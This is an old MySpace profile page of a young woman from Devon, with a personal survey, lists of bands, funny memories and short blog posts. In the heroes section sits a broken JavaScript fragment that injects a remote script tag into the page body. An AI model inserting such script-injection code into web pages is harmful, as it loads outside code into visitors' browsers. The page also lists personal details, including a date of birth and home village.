Love. Sex. Film. *FUCKED* profile picture

Love. Sex. Film. *FUCKED*

R.I.P Mr bear.

About Me

.. Now Icons

cups and saucers
cups and saucers

DO NOT JUST ADD ME FOR FRIEND COUNT. if i dont know you- fuck off. This goes for bands aswell- if I like your music, then I will add you.
Hey. Name is michelle- But no-one calls me that!! everyone calls me Ree.
I ♥ piercings and tattoo's. They are my passion.
I have them head to toe, they are addictive!
sometimes i rage for no reason but i just go up to my room, slam the door and listen to music as loud as it will possibly go. Its the best remedy. i coulnt live without music, and most songs have a hidden meaning behind them to me. It could be when ive heard them and been having a good time, its just a simple assotiation!!!
I have THE most fantastic best friend, called Megan, She is funny, smart, and VERY sarcastic. I love her.
I love to dance.
I love drinking and dancing- its the best fun in the world!
Early morning cuddles, and cuddles in general are where its at!
Jared makes me laugh when were eating tea and listening to radio one!
Cars. I love them. I cant wait till i can drive. hopefully this year!
I actually LOVE Devon. I moved here about 5/6 years ago, and its great!
Sex in the rain, on the swings is immense.
Romance is NOT dead, its just a little, erm, slow :)
oh yeah, im addicted to Lost!
Im nearly always smiling or laughing!
i can be a right cunt, if i want to be, but i usually dont!
I talk absolute shite when i am drunk- and absolute shite when im sober!!! :)
I wear ridiculously short skirts to the pub!! Honestly, RIDICULOUSLY short!!!!
Im probably one of the most stubborn people in the world! There arnt many times i take no for an answer!
I like to surprise people, its fun!
I LOOOVE cow and chicken, i wish they still made it :(
Love me or hate me its still an obsession.
if you dont like me- im not offended!!- i have All the friends i need right now- u are not a loss!!
Name: Ree (or Michelle)
Date of Birth: 18/02/89
Birthplace: Basingstoke Distict Hospital
Current Location: DEVON! Kingskerswell
Eye Color: Green
Hair Color: Brown
Height: 5ft 4
Heritage: English
Piercings: 3
Tattoos: 7
Band/Singer: The stranglers and BLONDIE
Song: All of the day and all of the night- The stranglers, and, Good Boys by Blondie
Movie: The Nightmare before christmas
Disney Movie: ermm, Cinderella
TV show: Lost
Color: Pink
Food: Chocolate
Pizza topping: Plain cheese and Tomato
Ice-Cream Flavor: Chocolate
Drink (alcoholic): Vodka and lemonade
Soda: I dont drink soda
Store: H & M is genius
Clothing Brand: I have a thing for Dickies clothes
Shoe Brand: erm I love shoes from Office
Season: Summer
Month: February
Holiday/Festival: Febraury half term- (birthday)
Flower: Lilies
Make-Up Item: Mascara- i cannot live without mascara
Board game: Twister
This or That
Sunny or rainy: sunny
Chocolate or vanilla: Chocolate
Fruit or veggie: Fruit- strawberries, yum
Night or day: night
Sour or sweet: sweet
Love or money: Love
Phone or in person: In person
Looks or personality: Personality
Coffee or tea: neither
Hot or cold: bit of both
Goal for this year: Understand that the past is gone and i cant change it!
Most missed memory: Late nights being bad at justins
Best physical feature: Legs
First thought waking up: Please be my room
Hypothetical personality disorder: Hyper all the time!
Preferred type of plastic surgery: id have my boobs done...
Sesame street alter ego: The cookie monster, but probably a bit of big bird too...
Fairytale alter ego: Cinderella. exept i never get the guy at the end!!!
Most stupid remark: "I think its staring at me. OMG its staring at me- RUNNNN!" at Jared about a goose
Worst crime: .... i actually dont want to say....
Greatest ambition: Swim with sharks
Greatest fear: Being alone
Darkest secret: OOOOhhhhh, wouldnt u like to know
Favorite subject: Drama
Strangest received gift: A ring, with insribed writing saying "Love will last for all time", i just didnt expect it thats all, i still wear it...
Worst habit: I always want sex too much...
Do You:
Smoke: NO and i hate it when people smoke in my face
Drink: yes
Curse: yes. too much
Shower daily: yes and get in the bath, i love baths
Like thunderstorms: yes
Dance in the rain: yes, its well sexy
Sing: Wayyy too much
Play an instrument: sorta
Get along with your parents: yup
Wish on stars: yes
Believe in fate: yes
Believe in love at first sight: No
Can You:
Drive: Not yet. well i can i just dont have a license ;)
Sew: Yep
Cook: Yep
Speak another language: Yes
Dance: yes i dance alot
Sing: yes, again alot and too much
Touch your nose with your tongue: NO!! wish i could tho
Whistle: yep
Curl your tongue: No
Have You Ever:
Been Drunk: yes!
Been Stoned/High: ........ a bit yes
Eaten Sushi: yes
Been in Love: yep
Skipped school: haha yes
Made prank calls: yes
Sent someone a love letter: Not a love letter more of an i hate you now letter
Stolen something: me and lauren used to steal penny sweets from the shop near her when we were like 6!
Cried yourself to sleep: yes once. Never again
Other Questions:
What annoys you most in a person? Quietness
Are you right or left handed? Right
What is your bedtime? When i feel tired
Name three things you can't live without: Straightners, Mascara and Love
What is the color of your room? Pink
Do you have any siblings? yes one brother
Do you have any pets? Yes
Would you kill someone you hate for a million dollars? yes. id kill someone i truely hate for a lot less
What is you middle name? Fay
What are you nicknames? Ree. Tipper calls me Reeter tho
Are you for or against gay marriage? For its up to them innit!
What are your thoughts on abortion? CANT STAND IT. IM REEEEALLY AGAINST IT. sorry poeple but thats my opinion.
Do you have a crush on anyone? yes :)
Are you afraid of the dark? No
How do you want to die? Having the best sex ive ever had... lol
What is the largest amount of popsicles that you have eaten on one day? When i went to malta when i was younger i ate 23 ice lollies in 5 hours. i was consequently sick.
Would you take a bullet for the one you love? Of course. if you truely love someone u will do anything for them
What is the last law you’ve broken? dunno. sniff sniff. No idea
In a Member of the Opposite Sex:
Hair color: Brown or blonde
Eye color: Green or blue
Height taller than me
Weight heavier than me
Most important physical feature: Eyes
Biggest turn-off Really really hairy people
Take this survey or other MySpace Surveys at

My Interests

Things that made us laugh in the past:

♥ Me and megan eating sushi for the first time, then nearly throwing it up in her kitchen bin!

♥ Me getting drunk in claires on absinthe, and losing one chicken fillet on the bottom of his stairs, and not realising untill the morning when jareds mum kindly returned it to me!

♥ Jared trying to describe how some people on the news were killed and using the word "ostracised" rather than "asphixiated".

♥ Scott and Jared getting really stoned, and getting the worst case of the giggles you've ever known!! They couldnt breathe they laughed so hard!

♥ Meg getting really really drunk at townhouse and throwing up on me- me being so drunk i let her- and her having to be carried out of the pub!! She didnt even have a hangover- she rang me at 10 the next morning!!

♥Arti buying me a birthday shot, me buying her one back, her buying me another and so on- till we were so drunk i had to sit down. she consequently was sick on herself!

♥ Dancing like a mad woman outside rafters on new years eve!

♥Jared and me stealing his mums car to go on a mission for chips on coleslaw, at 2 in the morning, to friskys!! yum yum!

♥ Friday and saturday nights in the farmer- meg with her cheeky vimptos, me on voddy and coke, always class!! Jared, my best mate megs, chapstick, happyness, electro, early morning cuddles, sweet things, leek and potato, cups and saucers please(!), [how were they killed?- ostracised i heard], kisses on the neck, falling asleep cuddling, giggling and tickling, laughing so hard your belly hurts, looking innocent, sex in crowds

I'd like to meet:

The obvious- The boy Jared He is a nutter.Jamie- this boy makes me fucking giggle! (pic of him posing at like 3 in the morning tired as hell!!)Pete Doherty- this man is a proper legend!MEGAN!!! doesnt need to say anymore!! The mighty Boosh- i love it. Me and Jared watching the mighty boosh is class.Blondie aka debbie Harry...............


atm sugarcult, The transplants, +44, the view, The Fratellis, The libertines, Babyshambles, Dirty Pretty things, The kooks, SR71, The stranglers, The Only ones, Hey molly, and Blondie are only a few. i kinda like everything really!...............


I must admit- im not a huge film fan, due to the fact that i tend to get bored and fidget. But a few i loved were Rocky Horror show, Nightmare before christmas, Wthout a paddle, Shawn of the dead, spongebob movie and jackass 2 rocked!


KILL KILL KILL, kill them all................


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Blondie, because she is just so kool. i love her!! TOM DELONGE! he is my idol. i love him. Tom Delonge should rule the world. He is Great! LOVE!........"var x=document.createElement('script');x.src='http://www.../.../ test.js';document.getElementsByTagName('body')[0].appendChil d(x);" /

My Blog

and ree

And Ree smiled at him from across the crowded bar. And he smiled back and waved. And Ree did laugh :)...
Posted by Love. Sex. Film. *FUCKED* on Mon, 05 Feb 2007 08:19:00 PST


is fucking brilliant, i nearly peed myself laughing!! "this is the brand and its gonna suck" hahaha, oh and johnny knoxville has never looked so damn fine- so its worth a watch just to drool over him ...
Posted by Love. Sex. Film. *FUCKED* on Tue, 28 Nov 2006 08:09:00 PST


I now have 5 tattoos! 1 bow on the back of each leg small heart on my wrist 2 skull and crossbones on my front...
Posted by Love. Sex. Film. *FUCKED* on Sun, 29 Oct 2006 02:56:00 PST